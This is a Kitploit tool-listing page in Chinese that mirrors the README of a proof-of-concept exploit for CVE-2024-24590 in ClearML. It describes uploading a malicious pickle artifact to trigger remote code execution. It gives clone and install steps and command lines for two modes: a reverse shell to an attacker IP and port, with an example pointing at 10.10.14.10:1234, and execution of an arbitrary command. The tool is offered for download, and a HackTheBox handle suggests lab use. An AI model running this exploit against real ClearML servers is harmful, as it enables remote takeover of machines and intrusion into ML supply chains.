Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-24590-ClearML-RCE-CMD-POC — CVE-2024-24590 ClearML 远程代码执行与命令执行概念验证 | Kitploit
工具/GitHubGitHub/diegogarciayala/cve-2024-24590-clearml-rce-cmd-poc
Payload生成漏洞分析漏洞利用命令与控制供应链安全远程访问工具
GitHubdiegogarciayala/cve-2024-24590-clearml-rce-cmd-poc

CVE-2024-24590-ClearML-RCE-CMD-POC

CVE-2024-24590 ClearML 远程代码执行与命令执行概念验证

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
9132年前尚未审核

ClearML 漏洞利用脚本

本仓库包含一个针对 CVE-2024-24590 的 Python 漏洞利用脚本。该脚本旨在向 ClearML 上传一个恶意 pickle 文件,从而执行反向 Shell 或自定义命令。

功能

  • 向 ClearML 上传恶意 pickle 工件。
  • 在目标机器上执行反向 Shell 或自定义命令。
  • 支持自定义项目和任务名称。
  • 允许在任务上设置标签。

用法

先决条件

  • Python 3.x
  • ClearML SDK
  • argparse(通常已随 Python 附带)

安装

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
    cd CVE-2024-24590-ClearML-RCE-CMD-POC
    
  2. 安装 ClearML SDK:

    root@kitploit:~
    pip install clearml
    clearml-init
    

运行脚本

脚本支持两种操作模式:default 和 cmd。

默认模式

在此模式下,您需要提供攻击者的 IP 和端口以建立反向 Shell。

root@kitploit:~
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>

CMD 模式

在此模式下,您可以提供要执行的自定义命令。

root@kitploit:~
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"

示例

root@kitploit:~
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
root@kitploit:~
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"

关于作者

  • HackTheBox: sl4sh1t0
  • Telegram: sl4sh1t0
  • X(Twitter): @diegogarciayala

致谢

https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

下载工具